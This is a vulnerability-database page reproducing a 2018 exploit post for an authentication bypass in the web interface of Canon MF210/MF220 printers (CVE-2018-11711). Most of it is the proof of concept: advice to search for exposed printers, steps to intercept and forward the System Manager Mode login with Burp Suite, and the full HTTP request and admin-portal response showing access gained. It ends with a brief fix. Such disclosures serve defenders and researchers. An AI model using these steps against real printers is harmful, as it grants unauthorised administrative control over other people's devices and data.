Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormHuy KhaPACKETSTORM:148067
HistoryJun 06, 2018 - 12:00 a.m.

Canon MF210 / MF220 Authentication Bypass

2018-06-0600:00:00
Huy Kha
packetstormsecurity.com
24

0.01 Low

EPSS

Percentile

83.4%

JSON
`# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ]  
# Date: [4.6.2018]  
# Exploit Author: [Huy Kha]  
# Vendor Homepage: [http://global.canon.com]  
# Software Link: [ Website ]  
# Version: MF210 & MF20 Series  
# Severity: High  
# Tested on: Mozilla FireFox  
# Description : An issue was discovered on Canon MF210 & MF220 printers webinterface.  
It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication.  
  
  
  
# PoC :  
Start searching for Canon MF210 & MF220 printers.  
You can recognize them with the /login.html parameter, but the version is  
also been displayed on the webinterface.  
https://imgur.com/a/5ON4HF6  
  
# Example :  
  
1. Go to the following url: http://127.0.0.1/login.html  
2. Click on System Manager Mode  
3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter.  
  
  
# Request :  
  
GET /portal_top.html HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101  
Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://129.2.52.116/login.html  
Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
# Response :  
  
HTTP/1.1 200 OK  
Expires: Thu, 1 Jan 1998 00:00:00 GMT  
Content-Type: text/html  
Content-Length: 6119  
Pragma: no-cache  
Cache-Control: no-store, no-cache, max-age=0  
Connection: close  
Set-Cookie:  
fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "  
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml" >  
<head>  
<meta http-equiv="content-type" content="text/html; charset=utf-8" />  
<meta http-equiv="content-script-type" content="text/javascript" />  
<meta http-equiv="content-style-type" content="text/css" />  
<meta http-equiv="pragma" content="no-cache" />  
<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0" />  
<meta http-equiv="expires" content="Thu, 01 Jan 1970 00:00:00 GMT" />  
<meta http-equiv="X-UA-Compatible" content="IE=7" />  
<link rel="shortcut icon" type="image/x-icon" href="media/favicon.ico" />  
<link rel="stylesheet" type="text/css" media="all" href="css/ja.css" />  
<link rel="stylesheet" type="text/css" media="all" href="css/common.css" />  
<link rel="stylesheet" type="text/css" media="all" href="css/portal.css" />  
<link rel="stylesheet" type="text/css" media="all" href="css/icons.css" />  
<script type="text/javascript" src="js/rui.js"></script>  
<script language="javascript">  
function unloadFunc(e) { }  
registEvent(window, "unload", unloadFunc);  
</script>  
<title>Remote UI: Portal: MF220&nbsp;Series: MF220 Series</title>  
</head>  
<body>  
<div id="container">  
<div id="ruiPotalSet">  
<div class="Wrapper">  
<div id="portalBranding">  
<h1 id="deviceLogo">  
<a href="portal_top.html">  
  
<img src="media/branding_logo_imageCLASS.png" />  
  
</a>  
</h1>  
<div id="productInformation">  
<table>  
<caption></caption>  
<colgroup>  
<col class="ItemNameColumn" />  
<col class="ItemValueColumn" />  
</colgroup>  
<tbody>  
<tr>  
<th>Device Name:</th>  
<td>MF220&nbsp;Series </td>  
</tr>  
<tr>  
<th>Product Name:</th>  
<td>MF220 Series </td>  
</tr>  
<tr>  
<th>Location:</th>  
<td> </td>  
</tr>  
</tbody>  
</table>  
</div>  
</div>  
<div id="commonTools">  
<fieldset id="authTools">  
  
<p><a href="/logout.cgi"><span class="Name">Log Out</span></a></p>  
</fieldset>  
</div>  
</div>  
<hr />  
</div>  
<div id="applications">  
<div id="portalApplicationBranding">  
<div class="Wrapper">  
<h1 id="applicationLogo"><img src="media/app_icon.png" /><span  
class="BrandingName">Remote UI: Portal</span></h1>  
<div id="appTools">  
<a href="mailto:"><span class="Name">Mail to System Manager</span></a>  
</div>  
</div>  
</div>  
<hr />  
<div id="applicationContents">  
<div class="Wrapper">  
<div id="contentsWrapper">  
<div id="contents">  
<div id="contentHeading_potal">  
<h2 class="PageName">Device Info</h2>  
<div id="contentHeadingTools">  
<div id="tmpUpdate">Last Updated:06/04/2018 04:27 AM</div>  
<div id="tmpReload">  
<a href="javascript:location.reload()"><img src="media/bh_updt.gif"  
alt="Update" title="Update" /></a>  
</div>  
</div>  
</div>  
<hr />  
<h2>Contents</h2>  
<div id="quotationModule">  
<div class="QuotationModuleHeading"><h3></h3></div>  
<div class="QuotationModuleElement">  
<div id="deviceBasicInformation" class="ContentModule">  
<div class="ModuleHeading"><h4>Device Basic Information</h4></div>  
<div id="deviceStatusModule" class="ModuleElement">  
<h5>Device Status</h5>  
<table class="PropertyListComponent">  
<colgroup>  
<col class="ItemNameColumn" />  
<col class="ItemValueColum" />  
</colgroup>  
<tbody>  
<tr>  
<th>Printer:</th>  
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>  
<span class="StatusMessage">Sleep mode.</span>  
</td>  
</tr>  
<tr>  
<th>Scanner:</th>  
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>  
<span class="StatusMessage">Sleep mode.</span>  
</td>  
</tr>  
  
<tr>  
<th>Fax:</th>  
<td><span class="StatusIcon"><img src="media/sg_ok.gif"/></span>  
<span class="StatusMessage">Ready to send or receive faxes.</span>  
</td>  
</tr>  
  
</tbody>  
</table>  
</div>  
<div id="deviceErrorInfoModule" class="ModuleElement">  
<h5>Error Information</h5>  
<p>No errors.</p>  
  
</div>  
</div>  
<div id="MaintenanceInfomationModule" class="ContentModule">  
<div class="ModuleHeading"><h4>Consumables Information</h4></div>  
<div id="paperInfomationModule" class="ModuleElement">  
<input type="button" class="ButtonEnable" value="Check Consumables Details"  
onclick="location.href='consumables_check.html'"/>  
<h5>Paper Information</h5>  
<table summary="Paper Source, Remaining Paper, Paper Size">  
<colgroup>  
<col class="PaperSourceColumn" />  
<col class="RemainColumn" />  
<col class="PaperSizeColumn" />  
<col class="PaperTypeColumn" />  
</colgroup>  
<thead>  
<tr>  
<th>Paper Source</th>  
<th>Paper Level</th>  
<th>Paper Size</th>  
<th>Paper Type</th>  
</tr>  
</thead>  
<tbody>  
<tr>  
<th>Multi-Purpose Tray</th>  
<td>None</td>  
  
<td>LTR</td>  
  
<td>Plain (16 lb Bond-23 lb Bond)</td>  
</tr>  
<tr>  
<th>Drawer 1</th>  
<td>OK</td>  
  
<td>LTR</td>  
  
<td>Plain (16 lb Bond-23 lb Bond)</td>  
</tr>  
</tbody>  
</table>  
</div>  
<div id="tonerInfomationModule" class="ModuleElement">  
<h5>Cartridge Information</h5>  
<table>  
<colgroup>  
<col class="ItemNameColumn" />  
<col class="ItemValueColumn" />  
</colgroup>  
<thead>  
<tr>  
<th>Color</th>  
<th>Level</th>  
</tr>  
</thead>  
<tbody>  
<tr>  
<th>Black</th>  
<td><img src="media/ink_bk06.gif" alt="" title="" />60%</td>  
</tr>  
</tbody>  
</table>  
</div>  
</div>  
<div id="linkInformationModule" class="ContentModule">  
<div class="ModuleHeading"><h4>Support Link</h4></div>  
<div class="ModuleElement">  
<table class="PropertyListComponent">  
<colgroup>  
<col class="ItemNameColumn" />  
<col class="ItemValueColumn" />  
</colgroup>  
<tbody>  
<tr>  
<th>Support Link:</th>  
  
<td></td>  
  
</tr>  
</tbody>  
</table>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
<hr />  
<div id="navigationWrapper">  
<div id="navigation">  
<h2>menu</h2>  
<div id="navStandard">  
<h3 class="GroupTitle">Standard Tool</h3>  
<ul>  
<li class="Main">  
<a href="j_plist.html" class="Standby SystemMain"><span class="Name">Status  
Monitor/Cancel</span></a>  
</li>  
<li class="Main">  
<a href="p_paper.html" class="Standby UsermodeMain"><span  
class="Name">Settings/Registration</span></a>  
</li>  
</ul>  
</div>  
  
<div id="navGeneral">  
<ul>  
<li class="Main">  
<a href="a_addresslistone.html" class="Standby AddressMain">  
<span class="Name">Address Book</span></a>  
</li>  
</ul>  
</div>  
  
</div>  
</div>  
</div>  
</div>  
</div>  
<hr />  
<div id="applicationInfo">  
<address class="SiteInforLegal">Copyright CANON INC. 2014</address>  
</div>  
</div>  
</div>  
</body>  
</html>  
  
  
  
# Do we have now access to the printer with System Manager Mode? : Yes  
  
# Screenshot : https://imgur.com/a/U6oBYNV  
  
# How to fix this? : Remove the default password and add a new (strong) password.  
  
  
`

Related

exploitdb 1
prion 1
cvelist 1
nvd 1
cve 1
openvas 1
zdt 1
exploitdb
exploitdb
Canon MF210/MF220 - Authenticaton Bypass
2018-06-06 00:00:00
prion
prion
Design/Logic Flaw
2018-06-04 13:29:00
cvelist
cvelist
CVE-2018-11711
2018-06-04 13:00:00
nvd
nvd
CVE-2018-11711
2018-06-04 13:29:00
cve
cve
CVE-2018-11711
2018-06-04 13:29:00
openvas
openvas
Canon MF210/MF220 Series Printers Access Bypass Vulnerability (Apr 2018)
2018-06-05 00:00:00
zdt
zdt
Canon MF210 / MF220 - Authenticaton Bypass Vulnerability
2018-06-06 00:00:00

0.01 Low

EPSS

Percentile

83.4%

JSON
Related for PACKETSTORM:148067
exploitdb1prion1cvelist1nvd1cve1openvas1zdt1